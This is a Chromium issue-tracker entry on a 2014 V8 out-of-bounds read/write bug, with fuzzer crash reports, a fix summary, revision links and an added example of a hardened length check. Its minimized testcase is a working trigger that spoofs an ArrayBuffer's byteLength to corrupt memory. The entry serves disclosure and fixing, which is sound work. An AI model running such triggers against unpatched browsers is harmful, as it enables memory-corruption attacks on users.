Pwnium 4: v8 OOB read/write with __defineGetter__ and bytesLength
Project Member Reported by infe...@chromium.org, Mar 12 2014

v8 OOB bug
Mar 12 2014
Detailed report: https://cluster-fuzz.appspot.com/testcase?key=5720086883074048
Uploader: inferno@chromium.org
Job Type: Linux_asan_chrome_mp
Crash Type: UNKNOWN
Crash Address: 0x609000150000
Crash State:
  - crash stack -
  v8::internal::Invoke
  v8::Script::Run
  WebCore::V8ScriptRunner::runCompiledScript
Minimized Testcase (0.21 Kb):
Download: https://cluster-fuzz.appspot.com/download/AMIfv972juZ8LFn7J8O9Gg3Ksg9ugGIInvgfeq-7w0wESmJ87-B5cZuy1gOXc8BmlNA4VBeFRZ1QmRP4O2w32AsPvaJtrL3wOokxkhQ_8GO2j8EcOIawwRj-vn1VcvCgQpF7XNfucx33vc_3HFSLZmyKwYo2b8yN5A

  <script>
  var ab = new ArrayBuffer(8);
  ab.__defineGetter__("byteLength", function() { return 0xFFFFFFFC; });
  var aaa = new Uint32Array(ab);
  for (var i = 0; i < 0x8000; i+=1) { aaa[i] = 1; }
  </script>
Mar 12 2014
(summarizing for the V8 team): The V8 fix is for all trusted usages of properties on ArrayBuffers and other TypedArray variants to use un-patchable intrinsics rather than a property access. Jakob has a patch that fixes this specific problem, but we're auditing the rest of the TypedArray code for similar problems.
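An added example in plain JavaScript, not from the bug report or from V8's source, of the principle behind that fix: a length check that reads `byteLength` through ordinary property lookup believes the testcase's own-property getter, while one that calls the intrinsic `ArrayBuffer.prototype.byteLength` accessor captured up front sees the real allocation. All function names here are my own.

```javascript
// Added example, not from the bug report or V8 source: contrast a length check
// that trusts the overridable `byteLength` property with one that reads the
// intrinsic accessor, the principle behind the fix described above.

// Capture the built-in accessor once, before any untrusted script runs.
// It reads the internal [[ArrayBufferByteLength]] slot, not a property.
const intrinsicByteLength =
  Object.getOwnPropertyDescriptor(ArrayBuffer.prototype, "byteLength").get;

// Naive: ordinary property lookup, so an own accessor (as in the testcase)
// or a patched prototype decides what "length" the check sees.
function naiveByteLength(ab) {
  return ab.byteLength;
}

// Hardened: call the captured getter on `ab`. Throws TypeError when `ab`
// is not a real ArrayBuffer, which is the right failure for a trusted path.
function trustedByteLength(ab) {
  return intrinsicByteLength.call(ab);
}

// A bounds check a binding layer would do before writing `count` 32-bit
// elements into `ab`; `lengthFn` selects which length source it trusts.
function fitsUint32(ab, count, lengthFn) {
  return count * 4 <= lengthFn(ab);
}

// Constructed input mirroring the report's testcase: an 8-byte buffer whose
// own `byteLength` getter claims 0xFFFFFFFC bytes (same effect as
// ab.__defineGetter__("byteLength", ...) in the original).
function makeLyingBuffer() {
  const ab = new ArrayBuffer(8);
  Object.defineProperty(ab, "byteLength", {
    get() { return 0xFFFFFFFC; },
    configurable: true,
  });
  return ab;
}

// Run both checks against the lying buffer for the testcase's 0x8000 writes.
function demo() {
  const ab = makeLyingBuffer();
  return {
    naive: naiveByteLength(ab),          // 4294967292, the lie is believed
    trusted: trustedByteLength(ab),      // 8, the real allocation
    naivePasses: fitsUint32(ab, 0x8000, naiveByteLength),     // true
    trustedPasses: fitsUint32(ab, 0x8000, trustedByteLength), // false
  };
}
```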
Mar 12 2014
Fixed in V8 bleeding_edge: https://code.google.com/p/v8/source/detail?r=19862. Merged to M33 as V8 3.23.17.23. Merged to M34 as V8 3.24.35.15.
Mar 12 2014
Detailed report: https://cluster-fuzz.appspot.com/testcase?key=5720086883074048
Uploader: inferno@chromium.org
Job Type: Linux_asan_chrome_mp
Crash Type: UNKNOWN
Crash Address: 0x00009fff8002
Crash State:
  - crash stack -
  WebCore::Document::popCurrentScript
  WebCore::ScriptLoader::executeScript
  WebCore::ScriptLoader::prepareScript
Regressed: https://cluster-fuzz.appspot.com/revisions?range=234419:234464
Minimized Testcase: https://cluster-fuzz.appspot.com/download/AMIfv972juZ8LFn7J8O9Gg3Ksg9ugGIInvgfeq-7w0wESmJ87-B5cZuy1gOXc8BmlNA4VBeFRZ1QmRP4O2w32AsPvaJtrL3wOokxkhQ_8GO2j8EcOIawwRj-vn1VcvCgQpF7XNfucx33vc_3HFSLZmyKwYo2b8yN5A
Mar 13 2014
Detailed report: https://cluster-fuzz.appspot.com/testcase?key=5905159708213248
Fuzzer: Mbarbella_js_mutation
Job Type: Linux_asan_d8_v8_arm
Crash Type: Heap-buffer-overflow READ 100000
Crash Address: 0xf5fcb3e0
Crash State:
  - crash stack -
  v8::internal::Runtime_ArrayBufferSliceImpl
  v8::internal::Simulator::SoftwareInterrupt
  v8::internal::Simulator::InstructionDecode
Minimized Testcase (3.50 Kb): https://cluster-fuzz.appspot.com/download/AMIfv940PeGBCMH8eFQpTfxqfeTehbbuuHbU-SfxhHHAB-1DJ3LMEoVU1tY-IFHG4LPXxpip_hohSuIJTEYFxY-XVlWwaiFfPY3-sBT7lazDV-TSiYP07VsE6MJSXYhFrp2z8Qe6XVSJq6H22maA1cyBdkPG2rzyng
Mar 13 2014
We get much better stacks from the arm build; logged above just for reference.
Mar 14 2014
ClusterFuzz has detected this issue as fixed in range 256789:256846.

Detailed report: https://cluster-fuzz.appspot.com/testcase?key=5720086883074048
Uploader: inferno@chromium.org
Job Type: Linux_asan_chrome_mp
Crash Type: UNKNOWN
Crash Address: 0x00009fff8002
Crash State:
  - crash stack -
  WebCore::Document::popCurrentScript
  WebCore::ScriptLoader::executeScript
  WebCore::ScriptLoader::prepareScript
Regressed: https://cluster-fuzz.appspot.com/revisions?range=234419:234464
Fixed: https://cluster-fuzz.appspot.com/revisions?range=256789:256846
Minimized Testcase: https://cluster-fuzz.appspot.com/download/AMIfv972juZ8LFn7J8O9Gg3Ksg9ugGIInvgfeq-7w0wESmJ87-B5cZuy1gOXc8BmlNA4VBeFRZ1QmRP4O2w32AsPvaJtrL3wOokxkhQ_8GO2j8EcOIawwRj-vn1VcvCgQpF7XNfucx33vc_3HFSLZmyKwYo2b8yN5A

If you suspect that the result above is incorrect, try re-doing that job on the testcase report page.
Mar 14 2014
ClusterFuzz has detected this issue as fixed in range 256789:256846.

Detailed report: https://cluster-fuzz.appspot.com/testcase?key=5905159708213248
Fuzzer: Mbarbella_js_mutation
Job Type: Linux_asan_d8_v8_arm
Crash Type: Heap-buffer-overflow READ 100000
Crash Address: 0xf5fcb3e0
Crash State:
  - crash stack -
  v8::internal::Runtime_ArrayBufferSliceImpl
  v8::internal::Simulator::SoftwareInterrupt
  v8::internal::Simulator::InstructionDecode
Fixed: https://cluster-fuzz.appspot.com/revisions?range=256789:256846
Minimized Testcase: https://cluster-fuzz.appspot.com/download/AMIfv940PeGBCMH8eFQpTfxqfeTehbbuuHbU-SfxhHHAB-1DJ3LMEoVU1tY-IFHG4LPXxpip_hohSuIJTEYFxY-XVlWwaiFfPY3-sBT7lazDV-TSiYP07VsE6MJSXYhFrp2z8Qe6XVSJq6H22maA1cyBdkPG2rzyng

If you suspect that the result above is incorrect, try re-doing that job on the testcase report page.
Jun 18 2014
Bulk update: removing view restriction from closed bugs.
Oct 1 2016
This bug has been closed for more than 14 weeks. Removing security view restrictions. For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot